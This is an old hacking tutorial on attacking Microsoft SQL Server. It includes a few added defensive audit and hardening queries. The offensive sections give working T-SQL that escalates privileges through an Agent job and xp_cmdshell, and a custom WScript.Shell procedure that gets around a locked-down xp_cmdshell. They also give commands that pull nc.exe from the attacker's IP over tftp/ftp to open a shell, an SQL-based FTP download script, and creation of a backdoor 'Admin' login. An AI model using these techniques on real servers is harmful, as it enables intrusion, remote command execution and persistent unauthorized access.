++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++
************************************************** *********************************************
*The Dirty SQL Tricks *
*Tutorial Written By: kd-team *
*Creditz: www.sqlsecurity.com, www.sqlteam.com, governmentsecurity.com, www.google.com *
*Special Creditz: Jockel, tian, xing *
*Use at your own risk. *
************************************************** *********************************************
0) Index
1) Tools Needed
2) Privilege Escalation
3) Removing Execute Access from users
4) Making your own xp_cmdshell (thx to Jockel for letting me put his tut in here)
5) Using SQL as an ftp client (thx to sqlteam.com for their great site)
6) SQL Accounts (handy for decoy)
0) Index
This will probably be the last tutorial I write on SQL security and things related to it.
Most of the other things are so case specific that they can't be covered in a general tutorial.
Hope this can be useful to you peeps; also hope that my English has improved since my first tutorial.
The tutorial included in here about making your own xp_cmdshell has been included after asking
Jockel for permission and him giving it.
1) Tools Needed
- osql.exe
- sqlexec.exe (the green apple)
- a shell
- brains
- FTP_SQLTEAM.dll
2) Privilege Escalation
There are relatively enough papers on this subject, so I will just give some code examples on how you can
do it. That should be enough to continue building on. This probably won't work if SP3 or higher is applied.
The example gives access to xp_cmdshell and enables the Windows guest account:
USE msdb
EXEC sp_add_job @job_name = 'ftp',
@enabled = 1,
@description = 'This will give a low privileged user access to xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ftp',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ""exec
master..xp_cmdshell " net user guest /active:yes''"""",N"Master"'
EXEC sp_add_jobserver @job_name = 'ftp',
@server_name = 'master'
EXEC sp_start_job @job_name = 'ftp'
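From the defender's side, a job created this way leaves a record in msdb: the job row lives in msdb.dbo.sysjobs and the step text in msdb.dbo.sysjobsteps. The audit query below is an added example, not code from the tutorial. It assumes SQL Server 2005 or later (SUSER_SNAME on owner_sid, IS_SRVROLEMEMBER with a login argument, the msdb SQLAgent*Role roles) and a login that can read msdb; it lists every job step whose command reaches out of plain T-SQL, who owns the job, and who is allowed to create jobs at all.

```sql
-- Added audit example (not from the tutorial): find SQL Agent job steps that
-- call xp_cmdshell, xp_execresultset or the OLE automation procedures, or that
-- run an OS command directly (subsystem 'CmdExec'), and show the owning login.
-- Assumes SQL Server 2005 or later; run as sysadmin or a login that can read msdb.
SELECT
    j.name                                                  AS job_name,
    j.enabled,
    SUSER_SNAME(j.owner_sid)                                AS job_owner,
    IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid))  AS owner_is_sysadmin,
    s.step_id,
    s.step_name,
    s.subsystem,            -- 'TSQL' in the trick above; 'CmdExec' runs a command line
    s.command,
    j.date_created,
    j.date_modified
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem = 'CmdExec'
   -- '_' is a single-character wildcard in LIKE; for a hunt that is acceptable
   OR s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%xp_execresultset%'
   OR s.command LIKE '%sp_OACreate%'
   OR s.command LIKE '%sp_OAMethod%'
ORDER BY j.date_modified DESC;

-- Who can create jobs in the first place: members of the msdb SQLAgent*Role
-- roles (SQLAgentUserRole, SQLAgentReaderRole, SQLAgentOperatorRole).
-- A low-privileged login in one of these roles deserves a second look.
SELECT r.name AS role_name, m.name AS member_name
FROM msdb.sys.database_role_members AS rm
JOIN msdb.sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN msdb.sys.database_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name LIKE 'SQLAgent%Role'
ORDER BY r.name, m.name;
```

A job owned by a non-sysadmin login whose step calls xp_cmdshell is the exact shape of the trick above and is worth investigating regardless of whether it ran. Note that @delete_level = 1 makes the job remove itself after a successful run, so a one-off query can miss it; the durable control is to keep the job-creating roles (and sysadmin) limited to known accounts and to apply the service pack the tutorial itself says breaks the technique.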
3) Removing Execute Access from users
This is kinda easy; usually just the following simple lines of code.
We use DENY because it overrules all access granted through group or role memberships.
DENY {permission} ON {tablename} TO {username}
DENY EXECUTE ON master… TO SA
4) Making your own xp_cmdshell (thx to Jockel for letting me put his tut in here)
************************************************** ************************************************** *****
*Hacking Secured SQL Servers *
*Tutorial Written By: Jockel *
*Creditz: tian xing *
*Use at your own risk. *
************************************************** ************************************************** *****
1) Index
2) Tools Needed
3) injecting own procedure
4) executing own procedure
1) Index
so this is a tut showing u how to "hack" so-called secured mssql servers …
the only method i know to really secure a mssql is denying execute rights for SA
2) Tools Needed
- A mssql server with username/password
- sqlbrowser.exe ( hxxp://www.timelink.cn/tianxing/files/SqlBrower.exe )
- other hack tools (nc.exe, tftp … )
- stored procedure ( hxxp://www.pstruh.cz/tips/detpg_cmdshell.htm )
3) injecting own procedure
First of all, credits for this go to Jockel; I only asked him permission to use it in my own
tutorial, since this might come in handy.
so, download and fire up sqlbrowser.exe. on the right side of the pr0gg insert IP, username and password.
on the left side of the pr0gg is a text field called "SQL Server Command"
the default command at program start is xp_cmdshell "dir c:\" which is not working on a secured mssql.
so, we have to create our own procedure
goto hxxp://www.pstruh.cz/tips/detpg_cmdshell.htm and copy the stored procedure and paste it in the
command field.
next replace the function name xp_cmdshell with our own. for example "fn_makeUpdate".
but that doesn't matter .. choose anything you want
well …
your command should look something like :
-----------------------------------------------
CREATE PROCEDURE fn_makeUpdate(@cmd varchar(255), @Wait int = 0) AS
--Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
--Run @cmd through the shell object (window style 0; @Wait = 1 waits for it to finish)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
--If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult
--Release the COM object
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
-----------------------------------------------
next click on connect ..
as soon as you are connected there are two possible responses :
- "bla bla did not return any results" means it worked goto point 2 =)
- other error means didn't work
if error "EXECUTE" or "CREATE" permissions appears then this mssql is really secure !
goto next target …
if there's a syntax error then resize the SQLBrowser window to full size !!
there should be no line break in your function at the wrong position !!
4) executing own procedure
so when you successfully injected your function you can now execute it .. =)
so fire up tftp or ftp server and then execute :
tftp:
fn_makeUpdate "tftp.exe -i <yourIP> get nc.exe"
ftp:
fn_makeUpdate "cmd.exe /c echo open <yourIP> <yourPort> >temp"
…. blah blah
but you have to execute it line by line !!
so finally upload nc.exe and start listening …
the only problem you got getting in this way is that you don't see the results of what you execute,
you just see "0" or "1".
and if an error "8007000.." or something like this appears this means that the executable you're
trying to execute does not exist on the host …
************************************************** ************************************************** *****
5) Using SQL as an ftp client
First of all, credits for this go to the SQL-TEAM; I've only used their dll and script in here
and then tried to explain everything in my own words. I do NOT take any credit for this.
Why should this be handy? Well, the answer to this is very simple.
Sometimes when you secure your server so that tftp, ftp and net aren't allowed, you may still want to be
able to transfer files. What could be better than doing it with SQL itself after having it all secured?
Well, let's get to work.
First of all, with this tut there will be another rar included that holds the code below + a dll you need.
Little explanation of how this works:
With SQL you can manipulate and call objects etc. So when you have a dll for which you know its functions,
it's a piece of cake to make an object from it and use the dll to do stuff SQL wouldn't normally be able
to do.
First you gotta upload the dll and register it:
Regsvr32.exe pathtodll\FTP_SQLTEAM.dll
After this is done you can just execute the script below.
The script below is an example script, so you gotta change the address, the file to get and the place where
it will be stored locally.
To execute the script you can do it like this (use the attached .sql for this purpose):
osql.exe -S 123.123.123.123 -U sa -P "" -i SQLTeam_ftp.sql
I won't explain how to change the things below because this is my last tutorial on SQL
and I think that you all should know how to do this by now.
Just remember that for each new file you want to download you must change the script.
************************************************** ************************************************** ****
/*
I've hard coded some of the values here in an effort to keep things simple.
You can make them parameters, such as server name, file name and location
in order to make your version more dynamic.
*/
--Create an instance of FTP Object
Set NoCount on
DECLARE @hr int --Holds error value for each sp_OA function
DECLARE @oPKG int --Holds the handle of the object
Declare @source varchar(255) --Hold error info
Declare @description varchar(255) --Hold error description
Declare @connected int --Hold the handle of the connection to the FTP Server
declare @opened int --Hold the handle of the Internet session
declare @getfile bit --Result of the success(1)/failure(0) of the getfile operation
--First, we want to create the object and store its handle in @oPKG
EXEC @hr = sp_OACreate 'FTP_SQLTeam.FTP_SQLDll', @oPKG OUT
--Check for errors
IF @hr <> 0
BEGIN
PRINT '*** Create Package object failed'
EXEC sp_OAGetErrorInfo @oPKG, @source OUT, @description OUT
select @description ,@source
RETURN
END
--Establish our internet connection
-- VB Equivalent=Open_Internet("myftp", 1, vbNullString, vbNullString, 0)
Exec @hr=sp_OAMethod @oPkg,Open_Internet,@opened Out,
@alias='myftp',
@accesstype=1,
@proxy='',
@bypass='',
@flags=0
--Check for errors
IF @hr <> 0
BEGIN
print 'Error in Open Internet Method'
EXEC sp_OAGetErrorInfo @oPkg, @source OUT, @description OUT
select @description ,@source
RETURN
END
--Connect to the FTP Server(microsoft.com)
--vb Equivalent Connect_Internet(connected, "ftp.microsoft.com", 0, "anonymous", "graz@sqlteam.com", 1, 0, 0)
Exec @hr=sp_OAMethod @oPkg,Connect_Internet,@Connected Out,
@handleid=@opened,
@server='ftp.microsoft.com',
@port=0,
@username='anonymous',
@pwd='graz@sqlteam.com',
@service=1,
@flags=0,
@context=0
--Check for errors
IF @hr <> 0
BEGIN
Print 'Error in Connect Internet Method'
EXEC sp_OAGetErrorInfo @oPkg, @source OUT, @description OUT
select @description ,@source
RETURN
END
--Get the file and direct it to our local drive
--vb Equivalent Get_File(sessionid, remotefile, newfile, failifexists, flagsandattr, flags, context) As Boolean
Exec @hr=sp_OAMethod @oPkg,Get_File,@getfile OUT,
@sessionid=@Connected,
@remotefile='/bussys/readme.txt',
@newfile='c:\msreadme.txt',
@failifexists=0,
@flagsandattr=0,
@flags=1,
@context=0
--Check for errors
IF @hr <> 0
BEGIN
Print 'Error in Get File Method'
EXEC sp_OAGetErrorInfo @oPkg, @source OUT, @description OUT
select @description ,@source
RETURN
END
--Since get file is boolean, we use a bit field to trap its return value
--if it's 1(True) then the file came in correctly
--See if file was imported successfully
if @getfile=1
begin
print 'Imported Successfully'
End
--Pretty simple here, call the close method and pass it your
--Internet connection handle. If it returns
Exec @hr=sp_OAMethod @oPkg,Close_Internet,null,
@inethandle=@connected
--Check for errors
IF @hr <> 0
BEGIN
Print 'Error in Close Internet Method'
EXEC sp_OAGetErrorInfo @oPkg, @source OUT, @description OUT
select @description ,@source
RETURN
END
Set NoCount off
************************************************** ************************************************** ****
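Both section 4 (WScript.Shell through sp_OACreate) and section 5 (the FTP dll through sp_OACreate) depend on the OLE automation procedures being callable, and section 4 additionally on xp_cmdshell having been the only thing that was locked down. The hardening script below is an added example; it is not from the tutorial and not SQLTeam's code. It assumes SQL Server 2005 or later, where 'Ole Automation Procedures' is a server option (on SQL Server 2000, which this tutorial was written for, there is no such switch), and it must be run as sysadmin.

```sql
-- Added hardening example (not from the tutorial): switch off the two features
-- sections 4 and 5 rely on. Assumes SQL Server 2005 or later; run as sysadmin.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 0;                  -- OS command execution
EXEC sp_configure 'Ole Automation Procedures', 0;    -- sp_OACreate, sp_OAMethod, ...
RECONFIGURE;

EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- Verify: value_in_use must be 0 for both rows.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- Detection side: every change through sp_configure is written to the SQL Server
-- error log as a line of the form
--   Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
-- so a log watch on "Configuration option" lines catches someone turning either back on.
```

Turning these off is a speed bump, not a wall: any sysadmin login, sa included, can run the same sp_configure and turn them back on, which is why the account hygiene in section 6 matters more than the switch itself. Registering the FTP dll with Regsvr32 also needs local administrator rights on the host, so an unknown COM server appearing in the registry is a separate signal worth keeping an eye on.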
6) SQL Accounts (handy for decoy)
First of all I will give some information on user accounts on a SQL server, then I will proceed to explain
how to make user accounts and give them some rights, and last I will just tell you how this can be used as
some kind of decoy.
How do accounts work on a SQL server?
SQL servers have several ways in which you can log in to them and in which you can set up a user account.
Mostly, when installed on win2k+ servers, the server can be installed in 2 ways:
windows only login
windows+SQL login
On Windows 98/me there is only 1 way it can be set up:
SQL login
You may think: what is the difference between those login modes? Well, that can be explained. When a SQL server
is set up in mixed mode (sql+win) login, you can attach Windows logins or domains to the SQL server. That
means that only people who have an account on Windows itself can log in to the SQL server. When in SQL mode,
people will be able to log in to the SQL server but not to Windows. However unnecessary it seems, this is
a rather important security aspect. Why, you ask? Well, very simple: once an attacker finds out that the login
he has bruteforced or just obtained from the SQL server is also a Windows account, he can do a lot more
damage than with only his SQL account (even though with only a SQL account you can do pretty much
damage).
So I hope this little explanation can be useful in understanding a bit how someone can authenticate himself
to a SQL server. Just keep in mind that even though you can make logins to a SQL server with Windows
accounts, you still WON'T be able to make Windows accounts from a SQL server. This was the very very basic
explanation of how it works, but it is far more complicated if you also want to know about server roles
etc. If you are planning on getting deeper into SQL then I suggest you buy a book on it. Beneath I will
explain how to make a SQL user first and then how to add existing Windows users to SQL.
Now let's continue with making SQL accounts and giving them rights.
EXEC sp_addlogin @loginame = 'username', @passwd = 'password', @defdb = 'master'
EXEC sp_addlogin @loginame = 'Admin', @passwd = 'fixed', @defdb = 'master'
rights:
USE master
EXEC sp_grantdbaccess 'Admin' -- the login needs a user in the database before it can be granted anything there
GRANT ALL TO Admin
Adding win32 users to SQL
EXEC sp_grantlogin 'Administrator' -- sp_grantlogin takes the Windows name as 'DOMAIN\Administrator' or 'MACHINE\Administrator'
Administrator MUST BE in the WIN NT user group. It has the rights of the Windows account.
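The flip side of this section for whoever runs the server: find out which authentication mode is on, and find the kind of SQL login the lines above create (fixed password, no policy) before an attacker does. The queries below are an added example, not from the tutorial. They assume SQL Server 2005 or later (sys.sql_logins, PWDCOMPARE, sys.server_role_members) and must be run as sysadmin, since password_hash is only visible with CONTROL SERVER.

```sql
-- Added audit example (not from the tutorial). Assumes SQL Server 2005 or later;
-- run as sysadmin so that password_hash is populated.

-- 1 = Windows authentication only, 0 = mixed mode (SQL logins such as 'Admin' allowed)
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;

-- SQL logins with a blank password, a password equal to the login name, or no
-- Windows password policy applied. PWDCOMPARE returns 1 when the clear text
-- matches the stored hash.
SELECT name,
       is_disabled,
       is_policy_checked,
       is_expiration_checked,
       CASE WHEN PWDCOMPARE('', password_hash) = 1   THEN 'blank password'
            WHEN PWDCOMPARE(name, password_hash) = 1 THEN 'password = login name'
            WHEN is_policy_checked = 0               THEN 'policy not enforced'
            ELSE 'ok'
       END AS finding
FROM sys.sql_logins
ORDER BY finding, name;

-- Members of sysadmin: each one is equivalent to sa and can re-enable xp_cmdshell
-- or OLE automation, so this list should be short and every name should be known.
SELECT m.name AS member_login, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;
```

A login that shows up as 'blank password' or 'password = login name' and is also a sysadmin member is the worst case the section describes, and a Windows login granted through sp_grantlogin that is a local or domain administrator is the cross-over case where a SQL compromise becomes a host compromise.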
(Captured From h4cky0u.pl)